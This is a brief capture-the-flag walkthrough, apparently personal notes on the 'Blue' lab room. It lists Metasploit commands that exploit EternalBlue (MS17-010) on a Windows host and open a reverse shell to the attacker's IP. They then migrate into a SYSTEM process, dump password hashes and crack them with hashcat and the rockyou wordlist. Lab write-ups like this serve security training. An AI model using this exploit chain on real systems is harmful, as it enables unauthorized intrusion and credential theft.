Blue (internal blue)

hack into a Windows machine, leveraging common misconfigurations issues.

// steps
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS ip
set payload windows/x64/shell/reverse_tcp
set LHOST tunIP
run
background (ctrl-z)
use post/multi/manage/shell_to_meterpreter
set SESSION 1

List all of the processes with 'ps'. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id.
Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down

hashdump

hashcat -m 1000 -a 0 hashrun1.txt -o cracked.txt /home/kali/htb/rockyou.txt

PreviousEmpline NextRelevant

Last updated 2 years ago

Was this helpful?